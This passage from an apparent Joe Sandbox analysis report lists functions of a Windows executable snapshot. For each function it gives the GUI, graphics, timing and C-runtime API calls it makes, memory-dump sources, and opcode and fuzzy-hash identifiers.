                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: MessageSend$LongWindow$InvalidateRect
                            • String ID:
                            • API String ID: 1976402638-0
                            • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                            • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                            • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                            • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                            Function 00440A0D Relevance: 9.1, APIs: 6, Instructions: 111windowCOMMON
                            Download Yara Rule
                            APIs
                            • ShowWindow.USER32(?,00000000), ref: 00440A8A
                            • EnableWindow.USER32(?,00000000), ref: 00440AAF
                            • ShowWindow.USER32(?,00000000), ref: 00440B18
                            • ShowWindow.USER32(?,00000004), ref: 00440B2B
                            • EnableWindow.USER32(?,00000001), ref: 00440B50
                            • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Show$Enable$MessageSend
                            • String ID:
                            • API String ID: 642888154-0
                            • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                            • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                            • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                            • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                            Function 0047974B Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 349COMMON
                            Download Yara Rule
                            Strings
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Variant$Copy$ClearErrorLast
                            • String ID: NULL Pointer assignment$Not an Object type
                            • API String ID: 2487901850-572801152
                            • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                            • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                            • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                            • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                            Function 00448804 Relevance: 9.1, APIs: 6, Instructions: 92windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Window$Enable$Show$MessageSend
                            • String ID:
                            • API String ID: 1871949834-0
                            • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                            • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                            • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                            • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                            Function 00441078 Relevance: 9.1, APIs: 6, Instructions: 86COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                            • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                            • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                            • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                            Function 00471A38 Relevance: 9.1, APIs: 6, Instructions: 79windowCOMMON
                            Download Yara Rule
                            APIs
                            • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                            • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                            • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                            • SendMessageW.USER32 ref: 00471AE3
                            • DestroyIcon.USER32(?), ref: 00471AF4
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                            • String ID:
                            • API String ID: 3611059338-0
                            • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                            • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                            • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                            • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                            Function 00455616 Relevance: 9.1, APIs: 6, Instructions: 78windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: DestroyWindow$DeleteObject$IconMove
                            • String ID:
                            • API String ID: 1640429340-0
                            • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                            • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                            • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                            • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                            Function 0044389A Relevance: 9.1, APIs: 6, Instructions: 76COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                              • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                            • _wcslen.LIBCMT ref: 004438CD
                            • _wcslen.LIBCMT ref: 004438E6
                            • _wcstok.LIBCMT ref: 004438F8
                            • _wcslen.LIBCMT ref: 0044390C
                            • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                            • _wcstok.LIBCMT ref: 00443931
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                            • String ID:
                            • API String ID: 3632110297-0
                            • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                            • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                            • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                            • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                            Function 00455168 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$DeleteMenuObject$IconWindow
                            • String ID:
                            • API String ID: 752480666-0
                            • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                            • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                            • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                            • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                            Function 004552FA Relevance: 9.1, APIs: 6, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                            • String ID:
                            • API String ID: 3275902921-0
                            • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                            • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                            • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                            • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                            Function 004556C8 Relevance: 9.1, APIs: 6, Instructions: 67windowCOMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: Destroy$DeleteObjectWindow$IconImageList_
                            • String ID:
                            • API String ID: 3275902921-0
                            • Opcode ID: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                            • Instruction ID: f2615e71845bffb995fe2c2b9381f89f67980fa6d4eb7dd8f13843e5971e4781
                            • Opcode Fuzzy Hash: ef392be253363c3276fd2682622d0856bd6baec92828374cdc4114f01cb4ab17
                            • Instruction Fuzzy Hash: 54213D70200A01DFD710EF25D9D4A2B37E9BF49312F10896EE945CB352D739D845CB69
                            Function 004331A2 Relevance: 9.1, APIs: 6, Instructions: 64sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331B9
                            • QueryPerformanceCounter.KERNEL32(?,?,00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331D4
                            • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331DE
                            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331E6
                            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,004A8178), ref: 004331F0
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: PerformanceQuery$CounterSleep$Frequency
                            • String ID:
                            • API String ID: 2833360925-0
                            • Opcode ID: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                            • Instruction ID: f8c058edd9890a080c9b5d5c764251204f1987641da473bf5ecf7e3e358c806a
                            • Opcode Fuzzy Hash: 454a0f1f7a5b9dabfe1a5840f9ecaff855ca9224c6d53cc9b14a46810094a05c
                            • Instruction Fuzzy Hash: 1911B632D0011DABCF00DFD9EA489EEB778FF49722F1145AAED04A6204DB755A01CBA4
                            Function 004555A8 Relevance: 9.1, APIs: 6, Instructions: 61windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32 ref: 004555C7
                            • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004555E2
                            • DeleteObject.GDI32(?), ref: 00455736
                            • DeleteObject.GDI32(?), ref: 00455744
                            • DestroyIcon.USER32(?), ref: 00455752
                            • DestroyWindow.USER32(?), ref: 00455760
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: DeleteDestroyMessageObjectSend$IconWindow
                            • String ID:
                            • API String ID: 3691411573-0
                            • Opcode ID: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                            • Instruction ID: 7bbaf3a525edecc9c7f674a1bc178dbce74773f27e06def1294b58b6a87c9b54
                            • Opcode Fuzzy Hash: a36765697229ff4e213bf7548d3c220621229afc2c11469716cb0ded27b8d901
                            • Instruction Fuzzy Hash: 3D116071204601DBC710DF69EDC8A2A77A8FB58322F10466AFD10DB292D779D849CB68
                            Function 00447275 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                              • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                              • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                              • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472A0
                            • LineTo.GDI32(?,?,?), ref: 004472AC
                            • MoveToEx.GDI32(?,?,?,00000000), ref: 004472BA
                            • LineTo.GDI32(?,?,?), ref: 004472C6
                            • EndPath.GDI32(?), ref: 004472D6
                            • StrokePath.GDI32(?), ref: 004472E4
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                            • String ID:
                            • API String ID: 372113273-0
                            • Opcode ID: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                            • Instruction ID: 9972a7b2ea06d4c5ad2b855a17b8a9a0d98d12ec42d2644493c4a69bc6448ed6
                            • Opcode Fuzzy Hash: 31eeda2ce056db83d926a779f5beead5a54a2e657b8e2367e9d837ae160c277d
                            • Instruction Fuzzy Hash: 7701BC76101214BBE3119B44ED8DFDF7B6CEF4A710F104259FA01A629187F42A02CBBD
                            Function 0044CC51 Relevance: 9.0, APIs: 6, Instructions: 50COMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32(00000000), ref: 0044CC6D
                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC78
                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC84
                            • ReleaseDC.USER32(00000000,00000000), ref: 0044CC90
                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCA8
                            • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CCB9
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_5_2_400000_incalculability.jbxd
                            Similarity
                            • API ID: CapsDevice$Release
                            • String ID:
                            • API String ID: 1035833867-0
                            • Opcode ID: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                            • Instruction ID: 48d0fedbc9b5ed1f8cca1220e36c4d83aa6571d18a2c693a8c9b468b660f0fbb
                            • Opcode Fuzzy Hash: 30463c625ccaefc53399fcb5a1d51c2b4aa5fdcbff3641f1d403fc7908ff7e54
                            • Instruction Fuzzy Hash: 60015276240214BFFB009F95DD89F5A7BACFF54751F14802EFF089B240D6B098008BA4
                            Function 00417082 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • __getptd.LIBCMT ref: 0041708E
                              • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                              • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                            • __amsg_exit.LIBCMT ref: 004170AE
                            • __lock.LIBCMT ref: 004170BE
                            • InterlockedDecrement.KERNEL32(?), ref: 004170DB
                            • _free.LIBCMT ref: 004170EE
                            • InterlockedIncrement.KERNEL32(02E12D00), ref: 00417106
                            Memory Dump Source
                            • Source File: 00000005.00000002.1898943414.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000005.00000002.1898917536.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899003785.0000000000482000.00000002.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899026953.0000000000490000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899045619.0000000000491000.00000008.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.0000000000492000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899063915.00000000004A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                            • Associated: 00000005.00000002.1899406328.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                            Joe Sandbox IDA Plugin
